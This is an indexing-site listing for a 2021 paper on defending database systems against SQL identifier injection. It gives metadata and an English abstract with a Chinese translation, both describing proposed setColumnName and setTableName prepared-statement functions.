Method of protection of database management systems against sql-identifier injection attacks

Science-based technologies Pub Date : 2021-12-31 DOI:10.18372/2310-5461.52.16385

Anna Dadonova, I. Yakoviv, V. Kozlovskiy

{"title":"Method of protection of database management systems against sql-identifier injection attacks","authors":"Anna Dadonova, I. Yakoviv, V. Kozlovskiy","doi":"10.18372/2310-5461.52.16385","DOIUrl":null,"url":null,"abstract":"The article reviews SQL injection and SQL identifier injection attacks in database management systems, identifies their nature, the threats they pose, and the types of these attacks. A new method of protecting database management systems from SQL identifier injection attacks is also covered. Proposed solution are functions that can be added to the prepared API statements: setColumnName: uses the column name and its index as arguments and setTableName: uses the table name and its index as arguments. This method allows you to prepare operators to fill placeholders with table and column names, prevents SQL-IDIA, does not skip schema information, has no restrictions on input-based sanitation approaches. These two features help prevent database management systems from leaking confidential database information by performing a default operation when the input column or table name does not exist in the database. For example, if a column name is used in a particular function and the column name is invalid, the database management system will sort the results by the first column of the table. Only the table and column names in our advanced API were examined, as GitHub analysis showed that 96% of concatenated IDs were table and column names. In all experiments, the new setColumnName feature surpassed the implementation of dynamic whitelisting. In two experiments, the implementation of a static whitelist slightly exceeded the name function of the new set of columns. Although this special approach has little performance advantage, whitelisting approaches can add non-trivial complexity to program code and lead to erroneous results. The new setColumnName feature has successfully prevented all these attacks. Filling placeholders with column names is practical and effective compared to existing special approaches, does not create additional costs compared to the existing functions of the trained operator, and is effective against SQL identifier injection attack.","PeriodicalId":388526,"journal":{"name":"Science-based technologies","volume":"39 1","pages":"0"},"PeriodicalIF":0.0000,"publicationDate":"2021-12-31","publicationTypes":"Journal Article","fieldsOfStudy":null,"isOpenAccess":false,"openAccessPdf":"","citationCount":"0","resultStr":null,"platform":"Semanticscholar","paperid":null,"PeriodicalName":"Science-based technologies","FirstCategoryId":"1085","ListUrlMain":"https://doi.org/10.18372/2310-5461.52.16385","RegionNum":0,"RegionCategory":null,"ArticlePicture":[],"TitleCN":null,"AbstractTextCN":null,"PMCID":null,"EPubDate":"","PubModel":"","JCR":"","JCRName":"","Score":null,"Total":0}

引用次数: 0

Abstract

The article reviews SQL injection and SQL identifier injection attacks in database management systems, identifies their nature, the threats they pose, and the types of these attacks. A new method of protecting database management systems from SQL identifier injection attacks is also covered. Proposed solution are functions that can be added to the prepared API statements: setColumnName: uses the column name and its index as arguments and setTableName: uses the table name and its index as arguments. This method allows you to prepare operators to fill placeholders with table and column names, prevents SQL-IDIA, does not skip schema information, has no restrictions on input-based sanitation approaches. These two features help prevent database management systems from leaking confidential database information by performing a default operation when the input column or table name does not exist in the database. For example, if a column name is used in a particular function and the column name is invalid, the database management system will sort the results by the first column of the table. Only the table and column names in our advanced API were examined, as GitHub analysis showed that 96% of concatenated IDs were table and column names. In all experiments, the new setColumnName feature surpassed the implementation of dynamic whitelisting. In two experiments, the implementation of a static whitelist slightly exceeded the name function of the new set of columns. Although this special approach has little performance advantage, whitelisting approaches can add non-trivial complexity to program code and lead to erroneous results. The new setColumnName feature has successfully prevented all these attacks. Filling placeholders with column names is practical and effective compared to existing special approaches, does not create additional costs compared to the existing functions of the trained operator, and is effective against SQL identifier injection attack.

查看原文本刊更多论文

保护数据库管理系统免受sql标识符注入攻击的方法

本文回顾了数据库管理系统中的SQL注入和SQL标识符注入攻击，确定了它们的性质、构成的威胁以及这些攻击的类型。本文还介绍了一种保护数据库管理系统免受SQL标识符注入攻击的新方法。建议的解决方案是可以添加到准备好的API语句中的函数:setColumnName:使用列名及其索引作为参数;setTableName:使用表名及其索引作为参数。此方法允许您准备操作符来用表和列名填充占位符，防止SQL-IDIA，不跳过模式信息，对基于输入的卫生方法没有限制。当数据库中不存在输入列或表名时，通过执行默认操作，这两个特性有助于防止数据库管理系统泄露机密数据库信息。例如，如果在特定函数中使用了列名，并且列名无效，则数据库管理系统将按表的第一列对结果进行排序。我们只检查了高级API中的表和列名，因为GitHub分析显示，96%的连接id是表和列名。在所有的实验中，新的setColumnName特性都超过了动态白名单的实现。在两个实验中，静态白名单的实现稍微超过了新列集的名称函数。尽管这种特殊的方法几乎没有性能优势，但白名单方法可能会给程序代码增加不小的复杂性，并导致错误的结果。新的setColumnName特性成功地阻止了所有这些攻击。与现有的特殊方法相比，用列名填充占位符是实用和有效的，与经过训练的操作符的现有函数相比，不会产生额外的成本，并且可以有效地对抗SQL标识符注入攻击。

本文章由计算机程序翻译，如有差异，请以英文原文为准。

求助全文

约1分钟内获得全文求助全文

来源期刊

Science-based technologies

自引率

0.00%

发文量